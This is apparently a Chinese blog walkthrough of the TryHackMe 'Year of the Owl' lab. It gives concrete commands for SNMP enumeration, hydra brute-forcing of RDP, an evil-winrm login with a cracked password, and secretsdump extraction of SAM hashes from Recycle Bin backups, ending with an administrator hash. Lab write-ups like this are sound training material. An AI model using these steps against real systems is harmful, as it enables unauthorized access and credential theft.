扫描打点



80只有一个图,扫不到其他的
139/445
呃,爆破不到,匿名也没有
呃,
3306的mysql和3389的远程桌面都连不上啊嗯5985的win-rm就更不用说了*偷看wp
要扫
UDP。。。这里需要注意只扫前 $10$ 端口,不然的话会好慢扫不出来:
1
nmap -sUV 10.10.141.39 --top-ports 10 -Pn

161/UDP:snmp枚举snmp是一个基于UDP的对网络设备管理的服务使用
onesixtyone进行枚举,这个工具也没自带,这个字典在attackbox里面并没有自带,在这里可以找到1
onesixtyone 10.10.141.39 -c common-snmp-community-strings-onesixtyone.txt

发现一个用户名
Jareth这时候考虑前面找到的
rdp和win-rm,爆一下1
hydra -l jareth -P /usr/share/wordlists/rockyou.txt 10.10.141.39 -t 4 rdp
再用
evil-winrm来连1
evil-winrm -i 10.10.88.208 -u jareth -p sarah
回收站找system备份提权
试图传
winpeas的时候被拦下来了,应该是防火墙或者杀软?看
wp在回收站发现了SAM和SYSTEM的备份但是
C:\$Recycle.Bin提示不存在,要根据当前用户的SID进入回收站:1
2whoami /user
cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'再移出来再下载:
再用
secretdump拿一下admin信息1
python3 secretsdump.py -sam '/home/mikannse/桌面/sam.bak' -system '/home/mikannse/桌面/system.bak' LOCAL
拿到哈希
administrators:6bc99ede9edcfecf9662fb0c0ddcfa7a
THM打靶日寄39-Year of the Owl
- 本文链接: http://noone40404.github.io/2024/12/06/THM打靶日寄39:Year of the Owl/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!